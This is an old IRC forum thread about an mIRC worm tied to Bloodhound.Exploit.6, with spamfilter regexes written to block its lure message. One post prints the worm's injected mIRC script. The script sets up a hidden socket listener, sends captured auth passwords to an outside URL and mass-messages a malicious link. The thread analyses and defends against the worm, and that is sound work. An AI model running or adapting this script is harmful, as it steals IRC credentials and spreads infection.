Page 1 of 1
bloodhound.exploit.6 (symantec's name for it)
Posted: Mon May 10, 2004 10:45 pm
by nexus
this was seen spreading via channel msg's recently on the net I'm on:
Code: Select all
www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
infected users always send that exact text in a channel to new users that join
I wrote a simple spamfilter that works fine, but it probably could use some tweaking
Code: Select all
spamfilter {
regex "^www\.fun-pix\.tk/blub_fish\.jpg <------- looooooooooool";
target channel;
reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
action block;
};
Posted: Mon May 10, 2004 10:57 pm
by nexus
maybe something like this would be better, in case more urls need to be added to the regex later (saves space)
Code: Select all
spamfilter {
regex "^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$";
target channel;
reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
action block;
};
Posted: Tue May 11, 2004 3:47 pm
by Syzop
Thanks for the report, will take a look :).
Posted: Tue May 11, 2004 5:04 pm
by Syzop
Pretty harmless/simple/stupid thing, this is what it does:
It exploits some known IE vuln that X other trojans also use (don't care to look it up ;p)... and then a highly advanced visual basic exe gets started (*laugh*) which tries to use DDE to send the following stuff:
Code: Select all
//write a.mrc on *:socklisten:x:sockaccept i | write a.mrc on *:sockread:i:sockread % $+ t $chr(124) tokenize 32 % $+ t $chr(124) if ($3 == :auth) url -an $!+(mitglied.lycos.de/z4p2k/a.php?d=,$encode($4,m),|,$encode($5,m)) | .load -rs a.mrc | socklisten x 6660 | server -m localhost 6660 | .timer -io 1 1 scon $!scon(0) window -h $+($chr(34),Status Window,$chr(34)) $chr(43) | .timer -io 1 1 scon $!scon(0) auth usepw q q | .timer -io 1 1 scon $!scon(0) auth usepw 1 | scon -a .AMSG www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
What is interresting is that the exe file contains the following:
Code: Select all
@*\AD:\Stefan\visual basic codes\code99\dde-mirc.vbp
and even:
(which you can find with google)
now this seem SOO stupid that it might be intentional (or part of it) ;).
Anyway.. still fun. *dinner*.
Posted: Thu Jun 10, 2004 8:50 am
by Dukat
nexus wrote:maybe something like this would be better, in case more urls need to be added to the regex later (saves space)
Code: Select all
spamfilter {
regex "^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$";
target channel;
reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
action block;
};
I think this regex is wrong (sorry for reposting in such an old thread).
But if I am right, the regex is wrong too in the CVS...
If the message is
Code: Select all
www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
Then
Code: Select all
^www\.fun-pix\.tk/blub_fish\.jpg <-{7} lo{12}l$
would be the correct regex, wouldn't it?
Posted: Thu Jun 10, 2004 4:45 pm
by aquanight
Actually, an even better regex would be:
Code: Select all
www\.fun-pix\.tk/blub_fish\.jpg <-+ lo+l
Differences being:
- Removed BOL and EOL assertions, to account for variants that insert whitespace/color codes/other messages before or after the string.
- Changed fixed length of the <- and lol portions to catch any lenght, since variants can easily modify these with more or less '-' or 'o' characters.
I can't imagine hitting false positives, when requring a match against an exact URL (might want to account for variants here?).
Posted: Thu Jun 10, 2004 5:11 pm
by codemastr
There is a reason we try to use ^ and $ as much as possible. Your's can have false positives. And here is an example,
<User> Someone just messaged me with, "
www.fun-pix.tk/blub_fish.jpg <------- looooooooooool" I think it is a virus, what should I do?
That would be blocked since it doesn't make sure that no other text is there.
Posted: Thu Jun 10, 2004 5:22 pm
by aquanight
Hmm... yeah...
Then again, users would have no need to send messages of that kind if you block the original (the user would never receive it).
So maybe keep the ^ and $
. I was just trying to account for variants that could insert text at the beginning or end, but then if such a variant does occur, we can tweak the spamfilter to hit that as well, I guess
.
Posted: Sat Jun 12, 2004 7:48 am
by Dukat
Well, BOT, the Regex in the CVS is ATM just wrong and won't match. "Someone" should correct it...
Or should I write a bug report?
Posted: Sat Jun 12, 2004 2:57 pm
by Syzop
Yeah, seems you are right... Strange nobody noticed :(.
Anyway, the page is down now so it no longer matters :p.
(perhaps a good idea to do a cleanup once in a while)
About ^ and $.. I'm always a bit unsure... coz if a user pastes it like that, eg:
<User> <spreader> go to:
http://www.virus.com/infectyou.html
<User> any idea what this is??
then the other user might click on it... and we end up with another infection.
So I can understand both points, neither one is perfect :P.
Anyway, another case: a virus spreading in msg.. then the user might paste it like that in a channel... which we didn't block at all... users are always a fun factor ;).
Basically I always just hope that this stuff is kept to a minimum, since we are presumed to block all the stuff in the first place so it never reaches the user... only thing left is cross-nets (or 'old events' / logs).. like: got a virus on dalnet, then ask on an unrealnet (where you are also connected to) what it is.
Blablabla :)
